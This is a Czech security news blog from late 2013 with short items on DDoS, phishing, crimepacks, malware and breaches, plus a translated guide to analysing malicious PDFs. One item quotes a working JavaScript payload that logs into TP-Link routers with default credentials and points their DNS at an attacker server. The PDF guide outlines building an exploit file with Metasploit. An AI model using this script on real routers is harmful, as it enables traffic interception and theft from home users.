čtvrtek 28. listopadu 2013

Bezpečnostní tým Active24 zaznamenal další DDoS útok ze sítě RETN

Podle dostupných informací přichází útok ze stejné sítě, jako během březnových DoS útoků a cílem útoku není pouze síť společnosti ACTIVE 24.
Z technického hlediska jde o DNS amplification attack, při kterém je zneužívána doména fkfkfkfa.com.
DNS amplification attack (překládáno jako DNS zesilující útok) spočívá v posílání DNS dotazů se zdrojovou IP adresou nastavenou na IP adresu oběti. Tento útok je považován za jeden z nejsilnějších útoků, jelikož jeho zesílení může dosáhnout více jak 70 násobku původních dat.
Žádost o překlad mívá průměrně 80 B. Odpověď na takový dotaz může mít maximálně 512 B. To nám dává asi šestinásobné zesílení. Šikovnější útočník využije DNS server s podporou EDNS, což je rozšíření, které umožňuje odpovědi větší než 4 KB.
Možná se ptáte, jak může být odpověď tak velká. Je to jednoduché. Součástí EDNS odpovědi jsou totiž také TXT záznamy, do kterých útočník uloží schválně dlouhé řetězce.

AirBank upozorňuje na novou vlnu podvodných emailů

Bankovní instituce AirBank upozorňuje na "obzvlášť vykutálený typ hackerského útoku na klienty bank".

Scénář celého útoku je nám všem velice dobře známý. Vše začíná e-mailem, který se tváří, jako kdyby pocházel z České pošty, a obsahuje škodlivou přílohu a odkaz na phishingovou stránku. Phishingová stránka vyzve uživatele ke stažení mobilní aplikace (většinou nazvané "Smartphone Security Software 3S"). Pokud si uživatel aplikaci stáhne, získá útočník, krom přihlašovacích údajů pomocí kterých se uživatel pokusí přihlásit, přístup k potvrzovacím SMS zprávám, které jsou potřeba k provedení plateb. Proti útoku oběti nepomůže ani dvoufaktorová autentizace.

U této příležitosti vydala banka seznam deseti dobrých rad pro bezpečné používání internetu. Pro našince je to stará písnička, ale říká se, že opakování je matka moudrosti, takže:

  1. Nepřihlašujte se na počítači, kterému nevěříte.
  2. Pravidelně aktualizujte prohlížeč, operační systém i všechny ostatní aplikace.
  3. Vždy si hlídejte, že má stránka platný SSL certifikát (viz obrázek)
  4. Používejte antivirový program
  5. přihlašujte výhradně z webu banky, jiným odkazům nevěřte.
  6. Nevěřte mailům, které po vás chtějí vaše hesla nebo telefonní číslo. Nikdy takové údaje nikomu neposílejte, i když se tváří jako důvěryhodná instituce.
  7. Neinstalujte na svůj telefon nebo počítač aplikace z nedůvěryhodných zdrojů.
  8. Hlídejte si svůj telefon a používejte zámek k zamčení displeje.
  9. Nikdy nikomu neříkejte svá hesla.
  10. Zkontrolujte si, jak máte nastavené limity na převody peněz.

Útočíme na domácí routery pomocí JavaScriptu

Internetoví zločinci se pomocí JavaScriptu snaží měnit nastavení DNS serverů u domácích routerů a tím se stát prostředníkem mezi uživatelem a internetem.

Skript, který je za celý útok zodpovědný, nezabere, i v případě, že se hodně snažím, ani 20 řádků. Funguje na jednoduchém principu, totiž nejdříve ověří dostupnost routeru načtením http://admin:admin@192.168.1.1/images/logo.jpg a v případě úspěchu přistoupí k samotným změnám konfigurace.

if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style='display:none'>");

    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');

    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>');
    document.writeln("</div>");
}

Jak si můžeme všimnout, tak útočník předpokládá, že jsou na routeru výchozí přihlašovací údaje a že je přístupný z adresy 192.168.1.1.

Funkce ip1() a ip3() jsou v našem případě zodpovědné za samotnou změnu DNS serverů. Nahrazením DNS serverů se z útočník stává Man-in-the-middle a získává přístup k celé komunikaci své oběti.

Tento skript napadá pouze routery společnosti TP-Link, ale k rozšíření portfolia napadnutelných routerů není potřeba příliš mnoho práce.

středa 27. listopadu 2013

Na černém trhu se objevil nový crimepack jménem Atrax

Mezi funkce Atraxu patří sledování provozu uživatelů, získávání dat z formulářů, těžba Bitcoinů i Litecoinů, krádeže BTC peněženek a jiných osobních dat nebo provádění DDoS útoků.

Celá komunikace mezi kontrolním a řídícím centrem a oběťmi probíhá přes síť Tor, což zaručuje relativní anonymitu. Komunikace přes Tor není žádnou novinkou, v poslední době podobným způsobem fungoval třeba botnet Mevada nebo Skynet.


Zdroj: http://www.ibtimes.com/

Na crimepacku je sympatická také jeho cena. Pár základních modulů bude případného zájemce stát přibližně 250 USD. V ceně jsou také aktualizace, opravy chyb a podpora.

Není pochyb o tom, že Atrax má všechny předpoklady pro to, stát se jedním z nejúspěšnějších crimepacků na černém trhu. Uvidíme, možná o něm ještě uslyšíme.

NIX.CZ uvedl video "Svět propojovacích uzlů"

Osvětové video se snaží ve zjednodušené a srozumitelné formě ukázat, jak funguje internet a jeho propojovací uzly.

Pěti a půl minutové video vytvořil český peeringový uzel NIX.CZ ve spolupráci s EURO-IX.

Smyslem filmu, který vznikl ve spolupráci několika předních evropských propojovacích uzlů, je ukázat především na to, čemu se tyto společnosti věnují. Důležitým odkazem snímku je také to, že Internet je otevřený systém, který vytvářejí sami jeho uživatelé, a to tím, že jsou schopni a ochotni spolupracovat. Martin Semrád, výkonný ředitel sdružení NIX.CZ.

úterý 26. listopadu 2013

Malware mířící na AutoCAD dláždí cestu budoucím útokům

Bezpečnostní výzkumníci z Trend Micro objevili nový a vzácný druh malwaru, který se tváří jako legitimní AutoCAD komponenta s příponou .fas, ale ve skutečnosti vytváří v systému díry, které jsou následně využívány k další infiltraci systému.

Malware byl označen jako ACM_SHENZ.A. Po otevření souboru je Trojanem vytvořen uživatelský účet s administrátorskými právy (většinou se nový účet jmenuje servicer), poté se pokusí zápisem do registrů vyřadit firewall, následně vytvoří ze všech diskových jednotek disky sdílené a nakonec otevře porty 137-139 (NetBIOS porty) a 445 (SMB). Útočník pak může zneužít známých chyb v SMB protokolu a tím mu odpadá nutnost crackování hesel, jelikož bude mít na postíženém systému rovnou administrátorská práva.


Ukázka zdrojového kódu malwaru

Trojan se na systém oběti dostavá buď stažením z nezabezpečených webů, nebo je do systému vložen jiným škodlivým kódem. Malware se zaměřuje zejména na firemní počítače, jelikož doma provozuje AutoCAD jen malý počet uživatelů. Za relativní úspěch může zřejmě to, že uživatelé nečekají, že by mohl být soubor s touto příponou vůbec škodlivý.

Historicky je malware mířící na AutoCAD velmi vzácný. V poslední době ovšem začíná být mezi útočníky stále více oblíbený, připomeňme si například trojan Medre, který byl odhalen v červnu tohoto roku.

Indická centrální banka napadena pakistánskými aktivisty

Oficiální webové stránky byly přetvořeny pakistánskými aktivisty z Pakistan Cyber Army a Team MaDLeeTs.

Podle všech indícií je deface reakcí na ranní útoky za kterými stojí Indian Cyber Army a které měli za následek znetvoření nebo znepřístupnění velkého množství pakistánských stránek.

Důvodem pro indické útoky bylo 5. výročí teroristických útoků na Bombaj. Pakistánští teroristé provedli 26.11.2008 deset bombových útoků v různých částech této metropole. Bombové útoky a následná střelba měla za následek nejméně 173 zabitých a 208 zraněných.

Z dánské bitcoinové směnárny BIPS byly ukradeny bitcoiny za více než milion dolarů

Tentokrát se tedy crackerům podařilo ukrást více než 1200 bitcoinů.

Společnost zatím neposkytla o útoku žádné bližší informace. Údajně v současné chvíli probíhá vyšetřování celého incidentu a obesílání poškozených uživatelů.

Provozovatelé BIPS vydali k útoku tiskovou zprávu, kde mimo jiné oznámili, že pozastavují provoz všech pěněženek a zaměří se na činnosti, které nezahrnují skladování bitcoinů.

Tento měsíc je to již třetí napadená bitcoinová služba. Na začátku měsíce se neznámému útočníkovi podařilo z bitcoinové peněženky inputs.io zcitit přes 4000 BTC a o pár dní později zmizelo z české směnárny bitcash.cz asi 500 BTC.

pondělí 25. listopadu 2013

Analýza škodlivých PDF souborů

Portable Document Format je možná vůbec nejrozšířenější formát pro sdílení dokumentů. Je používán jak jednotlivci, tak firmami, ke sdílení katalogů, faktur, knih, prostě všeho, co vás jenom napadne. Velmi oblíben je také mezi kyberzločinci. Pojďme si tedy ukázat nejen to, jak zjistit, jestli je soubor nějakým způsobem škodlivý, ale také to, jak formát PDF vypadá, a nesmíme opomenout ani to, jak se takový škodlivý soubor tvoří.
Tento článek je překladem originálu "Analyzing Malicious PDFs" od Rohita Shawa, který vyšel na webu www.infosecinstitute.com.
Předchozí roky nebyly pro uživatele příliš dobré. Bylo zveřejněno několik kritických zranitelností, například velice populární byl exploit zneužívající buffer overflow v Adobe Readeru do verze 9. Když se útočníkovi podaří dostat zhoubný soubor k uživateli, ať už pomocí sociálního inženýrství či prostým umístěním na internet, stačí ke spuštění škodlivého kódu pouhý akt otevření dokumentu. Většina útočníků pochopitelně poskytne uživateli původní soubor, takže si oběť nějaké neobvyklé aktivity ani nevšimne.
Adobe Reader - nejvíce zneužívaná aplikace - graf
Adobe Reader je vůbec nejzneužívanější aplikace posledních let (http://www.investintech.com/)
Jak jste si pravděpodobně všimli, PDF soubory jsou velice často součástí masových e-mailových kampaní. Tyto kampaně bývají bohužel velice často úspěšné. Abychom se nestali jednou z obětí, měli bychom vědět, jak takový zákeřný soubor odhalit (Někteří možná namítnou, že stačí neotvírat neznáme e-maily, což je sice pravda, ale k takovému dokumentu lze přijít i jinak).

Struktura PDF

Struktura PDF dokumentu
Formát PDF je schopný zobrazovat veliké množství obsahu (statický a dynamický). Dohromady tyto prvky tvoří vizuálně atraktivní, interaktivní a velice přenosný dokument. I když si všichni užíváme výhod, které z těchto funkcí plynou, má to i svou temnější stránku. Dynamický obsah v PDF souborů může totiž skrývat škodlivý obsah, který je často využíván k instalaci malwaru či ke krádežím osobních údajů.

Struktura PDF dokumentu

Základní struktura PDF dokumentu
  • Hlavička - obsahuje verzi PDF
  • Tělo - obsahuje sérii objektů použitých v souboru
  • Tabulka odkazů - obsahuje konkrétní pozice v souboru, na kterých začíná daný objekt
  • Závěrečná sekvence - obsahuje pozici na které začíná tabulka odkazů
Objekty, která lze použít v PDF souboru:
  • Logické hodnoty (Boolean) - Mohou nabývat hodnot true nebo false. Používají se jako hodnoty v polích (arrays) nebo slovnících (dictionaries), dále jako výsledek výpočetních funkcí PostScriptu nebo jako operandy podmíněných operátorů if a ifelse.
  • Čísla (Numbers) - Formát PDF zná dva typy numerických objektů: integer a real. Integer reprezentuje celá čísla, zatímco real reprezentuje čísla reálná. Rozsah a přesnost jsou závislé na uživatelském počítači.
  • Řetězce (Strings) - String objekt je složený ze série bajtů s hodnotami v rozsahu 0 až 255. Zápis těchto objektů je možné provádět dvěma způsoby
    • Sekvence unsigned integerů uzavřených v kulatých závorkách ().
    • Sekvence hexadecimálních dat uzavřených v lomených závorkách <>.
  • Jména (Names) - Jméno je atomický objekt jedinečně definován sekvencí znaků. Z toho vyplývá, že dva jmenné objekty sestávající ze stejné sekvence znaků jsou stejný objekt, a že nemají vnitřní strukturu. Jméno začíná lomítkem (/) a mezi lomítkem a samotným jménem nesmí být žádné bílé znaky.
  • Pole (Arrays) - Array objekt je ve formátu PDF chápán jako jednorozměrná množina sekvenčně seřazených objektů. Zapisuje se jako sekvence objektů uzavřených v hranatých závorkách [].
  • Slovníky (Dictionaries) - Slovník je vlastně asociativní pole, prvky (values) nejsou tedy indexovány posloupností celých čísel, nýbrž pomocí klíčů (keys). Klíč musí být, na rozdíl od hodnoty, která může být jakéhokoliv typu, vždy typu Jméno. Slovník se zapisuje jako sekvence párů klíč-hodnota uzavřených ve dvojitých lomených závorkách <<>>.
  • Streamy (Streams) - Stream je podobně jako string sekvence bajtů. PDF aplikace mohou ovšem číst stream postupně, zatím co řetězce musí byt přečteny celé najednou. Stream má zároveň neomezenou velikost, z toho důvodu jsou takto vkládány objekty s velkým množstvím dat, jako třeba obrázky nebo popisy stránek.
  • Nulové objekty (Null objects) - má typ a hodnotu, která se nerovná žádnému jinému objektu. Existuje jenom jeden objekt typu null, označený pomocí klíčového slova null.
(Původní článek se strukturou PDF dokumentu příliš nezabývá, dovolil jsem si ho tedy trošku rozšířit. Pokud chcete vědět o struktuře PDF souborů víc, mohu vás odkázat na článek na wikipedii.)

Vytváření škodlivého PDF

Nejčastěji je škodlivý kód napsaný v JavaScriptu, jelikož lze k exploitaci použít techniku heap sprayingu.

Ve chvíli, kdy oběť otevře nakažený PDF dokument, spustí se JavaScriptový kód, který spustí shell kód a z internetu se stáhne trojský kůň.
K vytvoření zákeřného souboru využijeme JavaScriptovou funkci util.printf(), která způsobí přetečení bufferu.

Vytvoření takové souboru by mohlo vypadat nějak takto:
  1. Otevřeme msfconsoli a spustíme následující příkazy.
  2. Jakmile budeme mít všechny možnosti nastavené tak, jak chceme, můžeme spustit exploit a vytvořit náš škodlivý soubor.
  3. Ještě před tím, než pošleme vytvořený soubor obětí, musíme nastavit listener k přijímání zpětných spojení.
  4. Ve chvíli, kdy oběť otevře PDF dokument, je zřízena relace a my můžeme pomocí meterpreteru přistupovat k systému oběti.

Analýza PDF dokumentu

Analýza PDF souboru zahrnuje přezkoumávání, dekódování a extrahování obsahu podezřelých objektů, které mohou být využity k exploitaci zranitelnosti v Adobe Readeru. Naštěstí nemusíme vše dělat ručně, práci nám ušetří stále se zvětšující počet online a offline analyzérů..

Online analyzéry

Při každém, byť sebemenším, podezření je dobré prozkoumat potenciálně nebezpečné dokumenty některým z mnoha online analyzérů. Ten nahraný škodlivý PDF soubor otestuje na většinu známých exploitů a ihned vrátí výsledek.

Wapewet

Wepawet je služba pro detekci a analýzu webového malwaru. V současné době podporuje nejen formát PDF, ale také Flash či JavaScript. Wepawet je dostupný na adresehttp://wepawet.iseclab.org a pro otestování souboru ho stačí nahrát nebo vložit odkaz na zdroj v internetu.

PDF Examiner

PDF Examiner od Malware Tracker je schopný, podobně jako Wapevet, najít v uploadovaném PDF souboru desítky známých exploitů. Navíc umožňuje uživateli zobrazit si přesnou strukturu dokumentu, což se nám bude velice hodit, pokud budeme chtít nějaký dokument testovat ručně. Nástroj najdete na www.malwaretracker.com.

Offline analyzéry

Pokud chceme PDF dokument testovat ručně, budou se nám hodit následující aplikace.

PDF Stream Dumper

Hned po instalaci PDF Stream Dumperu nahrajeme podezřelý soubor a program ihned začne s analýzou. V pravém sloupci jsou barevně rozlišené různé objekty, například červenou barvou je zvýrazněn JavaScript.
Nástroj, podobně jako ostatní aplikace, dokáže odhalit veliké množství známých exploitů. Pokud chceme náš soubor na tyto exploity otestovat , stačí kliknout na "Exploits scan". V našem škodlivém dokumentu PDF Stream Dumper správně indikuje exploit zranitelnosti CVE-2008-2992.

Peepdf

Peepdf je nástroj napsaný v Pythonu, který slouží k prozkoumání souborů PDF za účelem zjistit, zda je soubor škodlivý či nikoliv. Cílem tohoto nástroje je poskytnout bezpečnostnímu výzkumníkovi všechny potřebné komponenty pro průzkum PDF dokumentů v jedné aplikaci a nahradit tak 3-4 jiné aplikace.
Pojďme tedy analyzovat náš maliciouspdf.pdf.
Pokud PDFko obsahuje nějaké JavaScriptové objekty, je nám k dispozici JS příkaz, který takový objekt podrobí důkladné analýze. V případě, že byl kód navázán na nějaký spustitelný soubor, Peepdf nám zobrazí URl adresu, na které je takový soubor umístěn.

Origami

Origami je Ruby framework navržený k parsování, analýze a vytváření PDF dokumentů. Krom zjištění, jestli se v PDFku škodlivý kód nenachází, nám může pomoci také při vytváření takovýchto zákeřných dokumentů.

Pdfid

Pdfid je nástroj, který nám zprostředkuje velice užitečné informace o PDF souboru. Zejména se pokouší o extrahování informací v hlavičce, jako je například JavaScriptový kód, různé objekty, streamy a podobně. Pdfid nám tedy pomůže zjistit, co se vlastně uvnitř dokumentu děje.

Závěr

V předchozích letech bylo objeveno několik desítek zranitelností a jejich počet se ze dne na den zvětšuje. Z toho vyplývá, že je potřeba před otevřením analyzovat každý PDF soubor, jelikož prostý akt otevření dokumentu může vést ke stažení malwaru z internetu. K analýze je možné použít různé automatické online a offline nástroje. Pro zmenšení pravděpodobnosti kompromitace je vhodné používat alternativní prohlížeče (SumatraPDF, Foxit, PDF XChange), instalovat poslední aktualizace a v Adobe Readeru zakázat spouštění JavaScriptu.

Reference

  • http://cs.wikipedia.org/wiki/Portable_Document_Format
  • www.slideshare.net/null0x00/client-side-exploits-using-pdf
  • blog.zeltser.com/post/3235995383/pdf-stream-dumper-malicious-file-analysis
  • www.infosec.gov.hk/sc_chi/promotion/files/20100311_04.pdf



neděle 24. listopadu 2013

Malware z dílny NSA infikoval asi 50 000 počítačových sítí

Mezi zeměmi, kde by měl malware operovat, se pravděpodobně nachází i Česká republika.
Podle tajných dokumentů, které zveřejnil Edward Snowden, se NSA podařilo malwarem infikovat více než 50 000 počítačových sítí na celém světě.
Malware byl údajně navržen za účelem shromažďování citlivých informací. Bezpečnostní odborníci z nízkého počtu napadených sítí vyvozují, že cílem útoků byli telekomunikační společnosti, banky nebo třeba poskytovatelé internetu. Ti všichni mají totiž přístup k velkému počtu osobních dat.
Zajímavé je, že o útoku nejen věděly, ale možná se na něm i podílely, tajné služby Velké Británie, Kanady, Austrálie a Nového Zélandu.

pátek 22. listopadu 2013

Systém asymetrické kryptografie NTRU je dostupný pod open source licencí

NTRU je pod licencí GPL možné použít v open source aplikacích, pro komerční projekty je připravena proprietární licence. Díky tomu, jak je systém NTRU navržen, není možné šifru prolomit pomocí Shorova algoritmu (narozdíl od RSA či ECC), takže je odolný i proti útokům kvantových počítačů.

středa 20. listopadu 2013

Slabá hesla uživatelů GitHub terčem brute force útoku

Uživatelé serveru GitHub používající slabá hesla se stali oběťmi brute force útoku.

Podle blogového zápisku, který se objevil bezprostředně po útoku, se podařilo překonat obrané mechanismy omezující počet pokusů při zadávání hesla tím, že bylo pro útok použito okolo 40 000 unikátních IP adres. Napadeným uživatelům byla resetována hesla, osobní přístupové tokeny a SSH klíče byli smazány, takže je potřeba vytvořit nové.

Brute force útok, neboli útok hrubou silou, je snaha o rozluštění šifry (v našem případě hesla) bez znalosti jejího klíče. V praxi se jedná o systematické testování všech možných kombinací.

Vývojáři GitHubu doporučují používat dvoufaktorovou autorizaci a silná hesla. Díky útoku již nebude možné použití slabého čí slovníkového hesla.

pondělí 11. listopadu 2013

Mezinárodní vesmírná stanice nakažena malwarem

Vir byl na palubu ISS dopraven pomocí nakažených USB flash disků ruských kosmonautů.

Nikde není bezpečno. Dokonce i v chladném vesmíru si malware našel svou cestu. Podle bezpečnostního experta Eugena Kasperskyho byly SCADA systémy na palubě Mezinárodní vesmírné stanice napadeny proslulým počítačovým červem nazývaným Stuxnet.

Stuxnet asi není třeba nějak více představovat, postačí tak, když si řekneme, že se jedná o počítačový vir pravděpodobně armádního původu, který úspěšně infikoval íránskou jadernou elektrárnu Búšehr, resp. počítače s nainstalovaným řídícím systémem Siemens, které ovládají centrifugy na obohacování uranu.

Aby toho nebylo málo, tak se také objevila zpráva, že jedna nejmenovaná ruská jaderná elektrárna, která je odpojená od internetu, byla napadena stejným typem malwaru. Jak elektrárna dopadla Kaspersky nespecifikoval.

Počítačový zločinci ukrývají bankovní trojany do RTF souborů

Na nový způsob distribuce malwaru přišli brazilští crackeři, kteří své oběti infikují pomocí škodlivého RTF souboru.
Útok má víceméně stejný průběh jako jiné podobné podvodné kampaně. Jediný rozdíl je v tom, že místo obvyklého spustitelného souboru, nebo v lepším případě exploitu maskovaného jako pdf, spam obsahuje celkem nevinně vyhlížející RTF soubor nazvaný "Comprovante_Internet_Banking.rtf".
Při otevření souboru se v dokumentu zobrazí náhled obrázku se zprávou "Klikněte pro zvětšení". Nepochybuji o tom, že každého z vás napadne, co se při kliknutí stane. Ano správně. Místo zvětšení obrázku vyskočí na uživatele požadavek povolení spuštění CPL souboru. A ano, jedná se o malware. Podle Kaspersky Lab jde o Trojan.Win32.ChePro, brazilský bankovní trojan napsaný v Delphi.
Jak se zločincům podařio malware do dokumentu dostat? Útočníci jednoduše využili funkci na vložení objektů do RTF dokumentu.